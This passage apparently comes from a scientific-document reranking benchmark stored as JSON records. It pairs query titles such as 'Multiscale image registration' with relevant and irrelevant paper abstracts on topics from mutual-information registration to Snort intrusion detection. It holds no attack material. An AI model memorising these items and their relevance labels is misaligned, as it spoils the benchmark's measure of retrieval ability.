Supplemental Online Material [SOM]). Anthropomorphism Increases Trust, 7 All participants first completed a driving history questionnaire and a measure of dispositional anthropomorphism (Waytz et al., 2010). Scores on this measure did not vary significantly by condition, so we do not discuss them further. Participants in the Agentic and Anthropomorphic conditions then drove a short practice course to familiarize themselves with the car’s autonomous features. Participants coul",
"title": ""
},
{
"docid": "f1b48ea0f93578de8bbe083057211753",
"text": "Anecdotes from creative eminences suggest that executive control plays an important role in creativity, but scientific evidence is sparse. Invoking the Dual Pathway to Creativity Model, the authors hypothesize that working memory capacity (WMC) relates to creative performance because it enables persistent, focused, and systematic combining of elements and possibilities (persistence). Study 1 indeed showed that under cognitive load, participants performed worse on a creative insight task. Study 2 revealed positive associations between time-on-task and creativity among individuals high but not low in WMC, even after controlling for general intelligence. Study 3 revealed that across trials, semiprofessional cellists performed increasingly more creative improvisations when they had high rather than low WMC. Study 4 showed that WMC predicts original ideation because it allows persistent (rather than flexible) processing. The authors conclude that WMC benefits creativity because it enables the individual to maintain attention focused on the task and prevents undesirable mind wandering.",
"title": ""
},
{
"docid": "88f60c6835fed23e12c56fba618ff931",
"text": "Design of fault tolerant systems is a popular subject in flight control system design. In particular, adaptive control approach has been successful in recovering aircraft in a wide variety of different actuator/sensor failure scenarios. However, if the aircraft goes under a severe actuator failure, control system might not be able to adapt fast enough to changes in the dynamics, which would result in performance degradation or even loss of the aircraft. Inspired by the recent success of deep learning applications, this work builds a hybrid recurren-t/convolutional neural network model to estimate adaptation parameters for aircraft dynamics under actuator/engine faults. The model is trained offline from a database of different failure scenarios. In case of an actuator/engine failure, the model identifies adaptation parameters and feeds this information to the adaptive control system, which results in significantly faster convergence of the controller coefficients. Developed control system is implemented on a nonlinear 6-DOF F-16 aircraft, and the results show that the proposed architecture is especially beneficial in severe failure scenarios.",
"title": ""
},
{
"docid": "d7a1985750fe10273c27f7f8121640ac",
"text": "The large volumes of data that will be produced by ubiquitous sensors and meters in future smart distribution networks represent an opportunity for the use of data analytics to extract valuable knowledge and, thus, improve Distribution Network Operator (DNO) planning and operation tasks. Indeed, applications ranging from outage management to detection of non-technical losses to asset management can potentially benefit from data analytics. However, despite all the benefits, each application presents DNOs with diverse data requirements and the need to define an adequate approach. Consequently, it is critical to understand the different interactions among applications, monitoring infrastructure and approaches involved in the use of data analytics in distribution networks. To assist DNOs in the decision making process, this work presents some of the potential applications where data analytics are likely to improve distribution network performance and the corresponding challenges involved in its implementation.",
"title": ""
},
{
"docid": "eedcff8c2a499e644d1343b353b2a1b9",
"text": "We consider the problem of finding related tables in a large corpus of heterogenous tables. Detecting related tables provides users a powerful tool for enhancing their tables with additional data and enables effective reuse of available public data. Our first contribution is a framework that captures several types of relatedness, including tables that are candidates for joins and tables that are candidates for union. Our second contribution is a set of algorithms for detecting related tables that can be either unioned or joined. We describe a set of experiments that demonstrate that our algorithms produce highly related tables. We also show that we can often improve the results of table search by pulling up tables that are ranked much lower based on their relatedness to top-ranked tables. Finally, we describe how to scale up our algorithms and show the results of running it on a corpus of over a million tables extracted from Wikipedia.",
"title": ""
},
{
"docid": "6c2095e83fd7bc3b7bd5bd259d1ae9bb",
"text": "This paper basically deals with design of an IoT Smart Home System (IoTSHS) which can provide the remote control to smart home through mobile, infrared(IR) remote control as well as with PC/Laptop. The controller used to design the IoTSHS is WiFi based microcontroller. Temperature sensor is provided to indicate the room temperature and tell the user if it's needed to turn the AC ON or OFF. The designed IoTSHS need to be interfaced through switches or relays with the items under control through the power distribution box. When a signal is sent from IoTSHS, then the switches will connect or disconnect the item under control. The designed IoT smart home system can also provide remote controlling for the people who cannot use smart phone to control their appliances Thus, the designed IoTSHS can benefits the whole parts in the society by providing advanced remote controlling for the smart home. The designed IoTSHS is controlled through remote control which uses IR and WiFi. The IoTSHS is capable to connect to WiFi and have a web browser regardless to what kind of operating system it uses, to control the appliances. No application program is needed to purchase, download, or install. In WiFi controlling, the IoTSHS will give a secured Access Point (AP) with a particular service set identifier (SSID). The user will connect the device (e.g. mobile-phone or Laptop/PC) to this SSID with providing the password and then will open the browser and go to particular fixed link. This link will open an HTML web page which will allow the user to interface between the Mobile-Phone/Laptop/PC and the appliances. In addition, the IoTSHS may connect to the home router so that the user can control the appliances with keeping connection with home router. The proposed IoTSHS was designed, programmed, fabricated and tested with excellent results.",
"title": ""
},
{
"docid": "89aa13fe76bf48c982e44b03acb0dd3d",
"text": "Stock trading strategy plays a crucial role in investment companies. However, it is challenging to obtain optimal strategy in the complex and dynamic stock market. We explore the potential of deep reinforcement learning to optimize stock trading strategy and thus maximize investment return. 30 stocks are selected as our trading stocks and their daily prices are used as the training and trading market environment. We train a deep reinforcement learning agent and obtain an adaptive trading strategy. The agent’s performance is evaluated and compared with Dow Jones Industrial Average and the traditional min-variance portfolio allocation strategy. The proposed deep reinforcement learning approach is shown to outperform the two baselines in terms of both the Sharpe ratio and cumulative returns.",
"title": ""
},
{
"docid": "65110fa8d04aa6a4d4906020805fe7e7",
"text": "In this paper, an effective approach for the feature extraction of raw Electroencephalogram (EEG) signals by means of one-dimensional local binary pattern (1D-LBP) was presented. For the importance of making the right decision, the proposed method was performed to be able to get better features of the EEG signals. The proposed method was consisted of two stages: feature extraction by 1D-LBP and classification by classifier algorithms with features extracted. On the classification stage, the several machine learning methods were employed to uniform and non-uniform 1D-LBP features. The proposed method was also compared with other existing techniques in the literature to find out benchmark for an epileptic data set. The implementation results showed that the proposed technique could acquire high accuracy in classification of epileptic EEG signals. Also, the present paper is an attempt to develop a general-purpose feature extraction scheme, which can be utilized to extract features from different categories of EEG signals. 2014 Elsevier Inc. All rights reserved.",
"title": ""
},
{
"docid": "e3b87f15406ede861da6f0e7c0cfbf8c",
"text": "Recently, the web has rapidly emerged as a great source of financial information ranging from news articles to per- sonal opinions. Data mining and analysis of such financial information can aid stock market predictions. Traditional approaches have usually relied on predictions based on past performance of the stocks. In this paper, we introduce a novel way to do stock market prediction based on sentiments of web users. Our method involves scanning for financial message boards and extracting sentiments expressed by in- dividual authors. The system then learns the correlation between the sentiments and the stock values. The learned model can then be used to make future predictions about stock values. In our experiments, we show that our method is able to predict the sentiment with high precision and we also show that the stock performance and its recent web sentiments are also closely correlated.",
"title": ""
},
{
"docid": "a83fcfc62bdf0f58335e0853c006eaff",
"text": "Compressed sensing (CS) in magnetic resonance imaging (MRI) enables the reconstruction of MR images from highly undersampled k-spaces, and thus substantial reduction of data acquisition time. In this context, edge-preserving and sparsity-promoting regularizers are used to exploit the prior knowledge that MR images are sparse or compressible in a given transform domain and thus to regulate the solution space. In this study, we introduce a new regularization scheme by iterative linearization of the non-convex clipped absolute deviation (SCAD) function in an augmented Lagrangian framework. The performance of the proposed regularization, which turned out to be an iteratively weighted total variation (TV) regularization, was evaluated using 2D phantom simulations and 3D retrospective undersampling of clinical MRI data by different sampling trajectories. It was demonstrated that the proposed regularization technique substantially outperforms conventional TV regularization, especially at reduced sampling rates.",
"title": ""
},
{
"docid": "c68196f826f2afb61c13a0399d921421",
"text": "BACKGROUND\nIndividuals with mild cognitive impairment (MCI) have a substantially increased risk of developing dementia due to Alzheimer's disease (AD). In this study, we developed a multivariate prognostic model for predicting MCI-to-dementia progression at the individual patient level.\n\n\nMETHODS\nUsing baseline data from 259 MCI patients and a probabilistic, kernel-based pattern classification approach, we trained a classifier to distinguish between patients who progressed to AD-type dementia (n = 139) and those who did not (n = 120) during a three-year follow-up period. More than 750 variables across four data sources were considered as potential predictors of progression. These data sources included risk factors, cognitive and functional assessments, structural magnetic resonance imaging (MRI) data, and plasma proteomic data. Predictive utility was assessed using a rigorous cross-validation framework.\n\n\nRESULTS\nCognitive and functional markers were most predictive of progression, while plasma proteomic markers had limited predictive utility. The best performing model incorporated a combination of cognitive/functional markers and morphometric MRI measures and predicted progression with 80% accuracy (83% sensitivity, 76% specificity, AUC = 0.87). Predictors of progression included scores on the Alzheimer's Disease Assessment Scale, Rey Auditory Verbal Learning Test, and Functional Activities Questionnaire, as well as volume/cortical thickness of three brain regions (left hippocampus, middle temporal gyrus, and inferior parietal cortex). Calibration analysis revealed that the model is capable of generating probabilistic predictions that reliably reflect the actual risk of progression. Finally, we found that the predictive accuracy of the model varied with patient demographic, genetic, and clinical characteristics and could be further improved by taking into account the confidence of the predictions.\n\n\nCONCLUSIONS\nWe developed an accurate prognostic model for predicting MCI-to-dementia progression over a three-year period. The model utilizes widely available, cost-effective, non-invasive markers and can be used to improve patient selection in clinical trials and identify high-risk MCI patients for early treatment.",
"title": ""
},
{
"docid": "e57f85949378039249f36999c5f9b76e",
"text": "A good dialogue agent should have the ability to interact with users by both responding to questions and by asking questions, and importantly to learn from both types of interaction. In this work, we explore this direction by designing a simulator and a set of synthetic tasks in the movie domain that allow such interactions between a learner and a teacher. We investigate how a learner can benefit from asking questions in both offline and online reinforcement learning settings, and demonstrate that the learner improves when asking questions. Finally, real experiments with Mechanical Turk validate the approach. Our work represents a first step in developing such end-to-end learned interactive dialogue agents.",
"title": ""
}
] | scidocsrr |
8a702f828c04eb84995f90f525222b00 | Multiscale image registration. | [
{
"docid": "fd5a586adf75dfc33171e077ecd039bb",
"text": "An overview is presented of the medical image processing literature on mutual-information-based registration. The aim of the survey is threefold: an introduction for those new to the field, an overview for those working in the field, and a reference for those searching for literature on a specific application. Methods are classified according to the different aspects of mutual-information-based registration. The main division is in aspects of the methodology and of the application. The part on methodology describes choices made on facets such as preprocessing of images, gray value interpolation, optimization, adaptations to the mutual information measure, and different types of geometrical transformations. The part on applications is a reference of the literature available on different modalities, on interpatient registration and on different anatomical objects. Comparison studies including mutual information are also considered. The paper starts with a description of entropy and mutual information and it closes with a discussion on past achievements and some future challenges.",
"title": ""
},
{
"docid": "607797e37b056dab866d175767343353",
"text": "We propose a new method for the intermodal registration of images using a criterion known as mutual information. Our main contribution is an optimizer that we specifically designed for this criterion. We show that this new optimizer is well adapted to a multiresolution approach because it typically converges in fewer criterion evaluations than other optimizers. We have built a multiresolution image pyramid, along with an interpolation process, an optimizer, and the criterion itself, around the unifying concept of spline-processing. This ensures coherence in the way we model data and yields good performance. We have tested our approach in a variety of experimental conditions and report excellent results. We claim an accuracy of about a hundredth of a pixel under ideal conditions. We are also robust since the accuracy is still about a tenth of a pixel under very noisy conditions. In addition, a blind evaluation of our results compares very favorably to the work of several other researchers.",
"title": ""
}
] | [
{
"docid": "f69723ed73c7edd9856883bbb086ed0c",
"text": "An algorithm for license plate recognition (LPR) applied to the intelligent transportation system is proposed on the basis of a novel shadow removal technique and character recognition algorithms. This paper has two major contributions. One contribution is a new binary method, i.e., the shadow removal method, which is based on the improved Bernsen algorithm combined with the Gaussian filter. Our second contribution is a character recognition algorithm known as support vector machine (SVM) integration. In SVM integration, character features are extracted from the elastic mesh, and the entire address character string is taken as the object of study, as opposed to a single character. This paper also presents improved techniques for image tilt correction and image gray enhancement. Our algorithm is robust to the variance of illumination, view angle, position, size, and color of the license plates when working in a complex environment. The algorithm was tested with 9026 images, such as natural-scene vehicle images using different backgrounds and ambient illumination particularly for low-resolution images. The license plates were properly located and segmented as 97.16% and 98.34%, respectively. The optical character recognition system is the SVM integration with different character features, whose performance for numerals, Kana, and address recognition reached 99.5%, 98.6%, and 97.8%, respectively. Combining the preceding tests, the overall performance of success for the license plate achieves 93.54% when the system is used for LPR in various complex conditions.",
"title": ""
},
{
"docid": "f321a48e23e58c3200ce6c413f98c709",
"text": "Models of dream analysis either assume a continuum of waking and dreaming or the existence of two dissociated realities. Both approaches rely on different methodology. Whereas continuity models are based on content analysis, discontinuity models use a structural approach. In our study, we applied both methods to test specific hypotheses about continuity or discontinuity. We contrasted dream reports of congenitally deaf-mute and congenitally paraplegic individuals with those of non-handicapped controls. Continuity theory would predict that either the deficit itself or compensatory experiences would surface in the dream narrative. We found that dream form and content of sensorially limited persons was indifferent from those of non-handicapped controls. Surprisingly, perceptual representations, even of modalities not experienced during waking, were quite common in the dream reports of our handicapped subjects. Results are discussed with respect to feedforward mechanisms and protoconsciousness theory of dreaming.",
"title": ""
},
{
"docid": "4cb25adf48328e1e9d871940a97fdff2",
"text": "This article is concerned with parameters identification problems and computer modeling of thrust generation subsystem for small unmanned aerial vehicles (UAV) quadrotor type. In this paper approach for computer model generation of dynamic process of thrust generation subsystem that consists of fixed pitch propeller, EC motor and power amplifier, is considered. Due to the fact that obtainment of aerodynamic characteristics of propeller via analytical approach is quite time-consuming, and taking into account that subsystem consists of as well as propeller, motor and power converter with microcontroller control system, which operating algorithm is not always available from manufacturer, receiving trusted computer model of thrust generation subsystem via analytical approach is impossible. Identification of the system under investigation is performed from the perspective of “black box” with the known qualitative description of proceeded there dynamic processes. For parameters identification of subsystem special laboratory rig that described in this paper was designed.",
"title": ""
},
{
"docid": "ffdeaeb1df2fbaaa203fc19b08c69cbe",
"text": "In the past decade, the population of disability grew rapidly and became one of main problems in our society. The significant amounts of impaired patients include not only lower limb but also upper limb impairment such as the motor function of arm and hand. However, physical therapy requires high personal expenses and takes long time to complete the rehabilitation. In order to solve the problem mentioned above, a wearable hand exoskeleton system was developed in this paper. The hand exoskeleton system typically designed to accomplish the requirements for rehabilitation. Figure 1 shows the prototype of hand exoskeleton system which can be easily worn on human hand. The developed exoskeleton finger can provide bi-directional movements in bending and extension motion for all joints of the finger through cable transmission. The kinematic relations between the fingertip and metacarpal was derived and verified. Moreover, the construction of control system is presented in this paper. The preliminary experiment results for finger's position control have demonstrated that the proposed device is capable of accommodating to the aforementioned variables.",
"title": ""
},
{
"docid": "6234f9fc871fb8444d67bb9376e43ddd",
"text": "The paper proposes a novel method to detect fire and/or flame by processing the video data generated by an ordinary camera monitoring a scene. In addition to ordinary motion and color clues, flame and fire flicker are detected by analyzing the video in the wavelet domain. Periodic behavior in flame boundaries is detected by performing a temporal wavelet transform. Color variations in fire are detected by computing the spatial wavelet transform of moving fire-colored regions. Other clues used in the fire detection algorithm include irregularity of the boundary of the fire-colored region and the growth of such regions in time. All of the above clues are combined to reach a final decision.",
"title": ""
},
{
"docid": "421320aa01ba00a91a843f2c6f710224",
"text": "Visual simulation of natural phenomena has become one of the most important research topics in computer graphics. Such phenomena include water, fire, smoke, clouds, and so on. Recent methods for the simulation of these phenomena utilize techniques developed in computational fluid dynamics. In this paper, the basic equations (Navier-Stokes equations) for simulating these phenomena are briefly described. These basic equations are used to simulate various natural phenomena. This paper then explains our applications of the equations for simulations of smoke, clouds, and aerodynamic sound.",
"title": ""
},
{
"docid": "2e4ac47cdc063d76089c17f30a379765",
"text": "Determination of the type and origin of the body fluids found at a crime scene can give important insights into crime scene reconstruction by supporting a link between sample donors and actual criminal acts. For more than a century, numerous types of body fluid identification methods have been developed, such as chemical tests, immunological tests, protein catalytic activity tests, spectroscopic methods and microscopy. However, these conventional body fluid identification methods are mostly presumptive, and are carried out for only one body fluid at a time. Therefore, the use of a molecular genetics-based approach using RNA profiling or DNA methylation detection has been recently proposed to supplant conventional body fluid identification methods. Several RNA markers and tDMRs (tissue-specific differentially methylated regions) which are specific to forensically relevant body fluids have been identified, and their specificities and sensitivities have been tested using various samples. In this review, we provide an overview of the present knowledge and the most recent developments in forensic body fluid identification and discuss its possible practical application to forensic casework.",
"title": ""
},
{
"docid": "999331062a055e820ad7db50e6c0f312",
"text": "OBJECTIVE: To develop a valid, reliable instrument to measure the functional health literacy of patients. DESIGN: The Test of Functional Health Literacy in Adults (TOFHLA) was developed using actual hospital materials. The TOFHLA consists of a 50-item reading comprehension and 17-item numerical ability test, taking up to 22 minutes to administer. The TOFHLA, the Wide Range Achievement Test-Revised (WRAT-R), and the Rapid Estimate of Adult Literacy in Medicine (REALM) were administered for comparison. A Spanish version was also developed (TOFHLA-S). SETTING: Outpatient settings in two public teaching hospitals. PATIENTS: 256 English- and 249 Spanish-speaking patients were approached. 78% of the English- and 82% of the Spanish-speaking patients gave informed consent, completed a demographic survey, and took the TOFHLA or TOFHLA-S. RESULTS: The TOFHLA showed good correlation with the WRAT-R and the REALM (correlation coefficients 0.74 and 0.84, respectively). Only 52% of the English speakers completed more than 80% of the questions correctly. 15% of the patients could not read and interpret a prescription bottle with instructions to take one pill by mouth four times daily, 37% did not understand instructions to take a medication on an empty stomach, and 48% could not determine whether they were eligible for free care. CONCLUSIONS: The TOFHLA is a valid, reliable indicator of patient ability to read health-related materials. Data suggest that a high proportion of patients cannot perform basic reading tasks. Additional work is needed to determine the prevalence of functional health illiteracy and its effect on the health care experience.",
"title": ""
},
{
"docid": "c62a2f7fae5d56617b71ffc070a30839",
"text": "Digitization brings new possibilities to ease our daily life activities by the means of assistive technology. Amazon Alexa, Microsoft Cortana, Samsung Bixby, to name only a few, heralded the age of smart personal assistants (SPAs), personified agents that combine artificial intelligence, machine learning, natural language processing and various actuation mechanisms to sense and influence the environment. However, SPA research seems to be highly fragmented among different disciplines, such as computer science, human-computer-interaction and information systems, which leads to ‘reinventing the wheel approaches’ and thus impede progress and conceptual clarity. In this paper, we present an exhaustive, integrative literature review to build a solid basis for future research. We have identified five functional principles and three research domains which appear promising for future research, especially in the information systems field. Hence, we contribute by providing a consolidated, integrated view on prior research and lay the foundation for an SPA classification scheme.",
"title": ""
},
{
"docid": "f61d5c1b0c17de6aab8a0eafedb46311",
"text": "The use of social media creates the opportunity to turn organization-wide knowledge sharing in the workplace from an intermittent, centralized knowledge management process to a continuous online knowledge conversation of strangers, unexpected interpretations and re-uses, and dynamic emergence. We theorize four affordances of social media representing different ways to engage in this publicly visible knowledge conversations: metavoicing, triggered attending, network-informed associating, and generative role-taking. We further theorize mechanisms that affect how people engage in the knowledge conversation, finding that some mechanisms, when activated, will have positive effects on moving the knowledge conversation forward, but others will have adverse consequences not intended by the organization. These emergent tensions become the basis for the implications we draw.",
"title": ""
},
{
"docid": "81ca8bbbcb825d98367e9eed8b0baecb",
"text": "We show that relation extraction can be reduced to answering simple reading comprehension questions, by associating one or more natural-language questions with each relation slot. This reduction has several advantages: we can (1) learn relationextraction models by extending recent neural reading-comprehension techniques, (2) build very large training sets for those models by combining relation-specific crowd-sourced questions with distant supervision, and even (3) do zero-shot learning by extracting new relation types that are only specified at test-time, for which we have no labeled training examples. Experiments on a Wikipedia slot-filling task demonstrate that the approach can generalize to new questions for known relation types with high accuracy, and that zero-shot generalization to unseen relation types is possible, at lower accuracy levels, setting the bar for future work on this task.",
"title": ""
},
{
"docid": "c4d0a1cd8a835dc343b456430791035b",
"text": "Social networks offer an invaluable amount of data from which useful information can be obtained on the major issues in society, among which crime stands out. Research about information extraction of criminal events in Social Networks has been done primarily in English language, while in Spanish, the problem has not been addressed. This paper propose a system for extracting spatio-temporally tagged tweets about crime events in Spanish language. In order to do so, it uses a thesaurus of criminality terms and a NER (named entity recognition) system to process the tweets and extract the relevant information. The NER system is based on the implementation OSU Twitter NLP Tools, which has been enhanced for Spanish language. Our results indicate an improved performance in relation to the most relevant tools such as Standford NER and OSU Twitter NLP Tools, achieving 80.95% precision, 59.65% recall and 68.69% F-measure. The end result shows the crime information broken down by place, date and crime committed through a webservice.",
"title": ""
},
{
"docid": "2a6999ec21789e40d1cba1b1a98529b2",
"text": "With the increasing popularity of Internet commerce, a wealth of information about the customers can now be readily acquired on-line. An important example is the customers’ preference ratings for the various products offered by the company. Successful mining of these ratings can thus allow the company’s direct marketing campaigns to provide automatic product recommendations. In general, these recommender systems are based on two complementary techniques. Content-based systems match customer interests with information about the products, while collaborative systems utilize preference ratings from the other customers. In this paper, we address some issues faced by these systems, and study how recent machine learning algorithms, namely the support vector machine and the latent class model, can be used to alleviate these problems. D 2002 Elsevier Science B.V. All rights reserved.",
"title": ""
},
{
"docid": "1cf43e11b59d7c482c9ab565208238a2",
"text": "A powerful integrated fan-out (InFO) wafer level system integration (WLSI) technology has been developed to integrate application processor chip with memory package for smart mobile devices. This novel InFO technology is the first high performance Fan-Out Wafer Level Package (FO_WLP) with multi-layer high density interconnects proposed to the industry. In this paper we present the detailed comparison of InFO packages on package (InFO_PoP) with several other previously proposed 3D package solutions. Result shows that InFO_PoP has more optimized overall results on system performance, leakage power and area (form factor) than others, to meet the ever-increasing system requirements of mobile computing. InFO technology has been successfully qualified on package level with robust component and board level reliability. It is also qualified at interconnect level with high electromigration resistance. With its high flexibility and strong capability of multi-chips integration for both homogeneous and heterogeneous sub-systems, InFO technology not only provides a system scaling solution but also complements the chip scaling and helps to sustain the Moore's Law for the smart mobile as well as internet of things (IoT) applications.",
"title": ""
},
{
"docid": "f10438293c046a86515e303e39b6607b",
"text": "Remote measurement of the blood volume pulse via photoplethysmography (PPG) using digital cameras and ambient light has great potential for healthcare and affective computing. However, traditional RGB cameras have limited frequency resolution. We present results of PPG measurements from a novel five band camera and show that alternate frequency bands, in particular an orange band, allowed physiological measurements much more highly correlated with an FDA approved contact PPG sensor. In a study with participants (n = 10) at rest and under stress, correlations of over 0.92 (p <; 0.01) were obtained for heart rate, breathing rate, and heart rate variability measurements. In addition, the remotely measured heart rate variability spectrograms closely matched those from the contact approach. The best results were obtained using a combination of cyan, green, and orange (CGO) bands; incorporating red and blue channel observations did not improve performance. In short, RGB is not optimal for this problem: CGO is better. Incorporating alternative color channel sensors should not increase the cost of such cameras dramatically.",
"title": ""
},
{
"docid": "30e0918ec670bdab298f4f5bb59c3612",
"text": "Consider a single hard disk drive (HDD) composed of rotating platters and a single magnetic head. We propose a simple internal coding framework for HDDs that uses coding across drive blocks to reduce average block seek times. In particular, instead of the HDD controller seeking individual blocks, the drive performs coded-seeking: It seeks the closest subset of coded blocks, where a coded block contains partial information from multiple uncoded blocks. Coded-seeking is a tool that relaxes the scheduling of a full traveling salesman problem (TSP) on an HDD into a k-TSP. This may provide opportunities for new scheduling algorithms and to reduce average read times.",
"title": ""
},
{
"docid": "bd2707625e9077837f26b53d9f9c4382",
"text": "Planar transformer parasitics are difficult to model due to the complex winding geometry and their nonlinear and multivariate nature. This paper provides parametric models for planar transformer parasitics based on finite element simulations of a variety of winding design parameters using the Design of Experiments (DoE) methodology. A rotatable Central Composite Design (CCD) is employed based on a full 24 factorial design to obtain equations for the leakage inductance, inter and intra-winding capacitances, resistance, output current, and output voltage. Using only 25 runs, the final results can be used to replace time-intensive finite element simulations for a wide range of planar transformer winding design options. Validation simulations were performed to confirm the accuracy of the model. Results are presented using a planar E18/4/10 core set and can be extended to a variety of core shapes and sizes.",
"title": ""
},
{
"docid": "76849958320dde148b7dadcb6113d9d3",
"text": "Numerous recent approaches attempt to remove image blur due to camera shake, either with one or multiple input images, by explicitly solving an inverse and inherently ill-posed deconvolution problem. If the photographer takes a burst of images, a modality available in virtually all modern digital cameras, we show that it is possible to combine them to get a clean sharp version. This is done without explicitly solving any blur estimation and subsequent inverse problem. The proposed algorithm is strikingly simple: it performs a weighted average in the Fourier domain, with weights depending on the Fourier spectrum magnitude. The method's rationale is that camera shake has a random nature and therefore each image in the burst is generally blurred differently. Experiments with real camera data show that the proposed Fourier Burst Accumulation algorithm achieves state-of-the-art results an order of magnitude faster, with simplicity for on-board implementation on camera phones.",
"title": ""
},
{
"docid": "ad55ca7e3e027eb688fc41d557b21b00",
"text": "Intrusion Detection Systems (IDS) are among the fastest growing technologies in computer security domain. These systems are designed to identify/ prevent any hostile intrusion into a network. Today, variety of open source and commercial IDS are available to match the users/ network requirements. It has been accepted that the open source intrusion detection systems enjoys more support over commercial systems on account of cost, flexible configuration, online support, cross platform implementation etc. Among open source IDS, Snort has secured a prominent place and has been considered as a de facto standard in the IDS market. Snort is the real time packet analyser and packet logger that perform packet payload inspection by using contents matching algorithms. The system has been considered as a good alternative to expensive and heavy duty Network Intrusion Detection systems (NIDS). This research work has focussed on analysing the performance of Snort under heavy traffic conditions. This has been done on a test bench specifically designed to replicate the current day network traffic. Snort has been evaluated on different operating systems (OS) platforms and hardware resources by subjecting it to different categories of input traffic. Attacks were also injected to determine the detection quality of the system under different conditions. Our results have identified a strong performance limitation of Snort; it was unable to withstand few hundred mega bits per second of network traffic. This has generated queries on the performance of Snort and opened a new debate on the efficacy of open source systems.",
"title": ""
},
{
"docid": "8830ac3811056de2e5a9656504c7aa0c",
"text": "Mobile Music Touch (MMT) helps teach users to play piano melodies while they perform other tasks. MMT is a lightweight, wireless haptic music instruction system consisting of fingerless gloves and a mobile Bluetooth enabled computing device, such as a mobile phone. Passages to be learned are loaded into the mobile phone and are played repeatedly while the user performs other tasks. As each note of the music plays, vibrators on each finger in the gloves activate, indicating which finger is used to play each note. We present two studies on the efficacy of MMT. The first measures 16 subjects' ability to play a passage after using MMT for 30 minutes while performing a reading comprehension test. The MMT system was significantly more effective than a control condition where the passage was played repeatedly but the subjects' fingers were not vibrated. The second study compares the amount of time required for 10 subjects to replay short, randomly generated passages using passive training versus active training. Participants with no piano experience could repeat the passages after passive training while subjects with piano experience often could not.",
"title": ""
}
] | scidocsrr |
8bb3bc967fb1bdf65c975be0db37c540 | Learning Step Size Controllers for Robust Neural Network Training | [
{
"docid": "6af09f57f2fcced0117dca9051917a0d",
"text": "We present a novel per-dimension learning rate method for gradient descent called ADADELTA. The method dynamically adapts over time using only first order information and has minimal computational overhead beyond vanilla stochastic gradient descent. The method requires no manual tuning of a learning rate and appears robust to noisy gradient information, different model architecture choices, various data modalities and selection of hyperparameters. We show promising results compared to other methods on the MNIST digit classification task using a single machine and on a large scale voice dataset in a distributed cluster environment.",
"title": ""
},
{
"docid": "00d9e5370a3b14d51795a25c97a3ebfb",
"text": "Policy search is a successful approach to reinforcement learning. However, policy improvements often result in the loss of information. Hence, it has been marred by premature convergence and implausible solutions. As first suggested in the context of covariant policy gradients (Bagnell and Schneider 2003), many of these problems may be addressed by constraining the information loss. In this paper, we continue this path of reasoning and suggest the Relative Entropy Policy Search (REPS) method. The resulting method differs significantly from previous policy gradient approaches and yields an exact update step. It works well on typical reinforcement learning benchmark problems. Introduction Policy search is a reinforcement learning approach that attempts to learn improved policies based on information observed in past trials or from observations of another agent’s actions (Bagnell and Schneider 2003). However, policy search, as most reinforcement learning approaches, is usually phrased in an optimal control framework where it directly optimizes the expected return. As there is no notion of the sampled data or a sampling policy in this problem statement, there is a disconnect between finding an optimal policy and staying close to the observed data. In an online setting, many methods can deal with this problem by staying close to the previous policy (e.g., policy gradient methods allow only small incremental policy updates). Hence, approaches that allow stepping further away from the data are problematic, particularly, off-policy approaches Directly optimizing a policy will automatically result in a loss of data as an improved policy needs to forget experience to avoid the mistakes of the past and to aim on the observed successes. However, choosing an improved policy purely based on its return favors biased solutions that eliminate states in which only bad actions have been tried out. This problem is known as optimization bias (Mannor et al. 2007). Optimization biases may appear in most onand off-policy reinforcement learning methods due to undersampling (e.g., if we cannot sample all state-actions pairs prescribed by a policy, we will overfit the taken actions), model errors or even the policy update step itself. Copyright c © 2010, Association for the Advancement of Artificial Intelligence (www.aaai.org). All rights reserved. Policy updates may often result in a loss of essential information due to the policy improvement step. For example, a policy update that eliminates most exploration by taking the best observed action often yields fast but premature convergence to a suboptimal policy. This problem was observed by Kakade (2002) in the context of policy gradients. There, it can be attributed to the fact that the policy parameter update δθ was maximizing it collinearity δθ∇θJ to the policy gradient while only regularized by fixing the Euclidian length of the parameter update δθ δθ = ε to a stepsize ε. Kakade (2002) concluded that the identity metric of the distance measure was the problem, and that the usage of the Fisher information metric F (θ) in a constraint δθF (θ)δθ = ε leads to a better, more natural gradient. Bagnell and Schneider (2003) clarified that the constraint introduced in (Kakade 2002) can be seen as a Taylor expansion of the loss of information or relative entropy between the path distributions generated by the original and the updated policy. Bagnell and Schneider’s (2003) clarification serves as a key insight to this paper. In this paper, we propose a new method based on this insight, that allows us to estimate new policies given a data distribution both for off-policy or on-policy reinforcement learning. We start from the optimal control problem statement subject to the constraint that the loss in information is bounded by a maximal step size. Note that the methods proposed in (Bagnell and Schneider 2003; Kakade 2002; Peters and Schaal 2008) used a small fixed step size instead. As we do not work in a parametrized policy gradient framework, we can directly compute a policy update based on all information observed from previous policies or exploratory sampling distributions. All sufficient statistics can be determined by optimizing the dual function that yields the equivalent of a value function of a policy for a data set. We show that the method outperforms the previous policy gradient algorithms (Peters and Schaal 2008) as well as SARSA (Sutton and Barto 1998). Background & Notation We consider the regular reinforcememt learning setting (Sutton and Barto 1998; Sutton et al. 2000) of a stationary Markov decision process (MDP) with n states s and m actions a. When an agent is in state s, he draws an action a ∼ π(a|s) from a stochastic policy π. Subsequently, the 1607 Proceedings of the Twenty-Fourth AAAI Conference on Artificial Intelligence (AAAI-10)",
"title": ""
},
{
"docid": "a9b20ad74b3a448fbc1555b27c4dcac9",
"text": "A new learning algorithm for multilayer feedforward networks, RPROP, is proposed. To overcome the inherent disadvantages of pure gradient-descent, RPROP performs a local adaptation of the weight-updates according to the behaviour of the errorfunction. In substantial difference to other adaptive techniques, the effect of the RPROP adaptation process is not blurred by the unforseeable influence of the size of the derivative but only dependent on the temporal behaviour of its sign. This leads to an efficient and transparent adaptation process. The promising capabilities of RPROP are shown in comparison to other wellknown adaptive techniques.",
"title": ""
}
] | [
{
"docid": "dcafec84cfcfad2c9c679e43eb87949a",
"text": "A novel design of a microstrip patch antenna with switchable slots (PASS) is proposed to achieve circular polarization diversity. Two orthogonal slots are incorporated into the patch and two pin diodes are utilized to switch the slots on and off. By turning the diodes on or off, this antenna can radiate with either right hand circular polarization (RHCP) or left hand circular polarization (LHCP) using the same feeding probe. Experimental results validate this concept. This design demonstrates useful features for wireless communication applications and future planetary missions.",
"title": ""
},
{
"docid": "c8be0e643c72c7abea1ad758ac2b49a8",
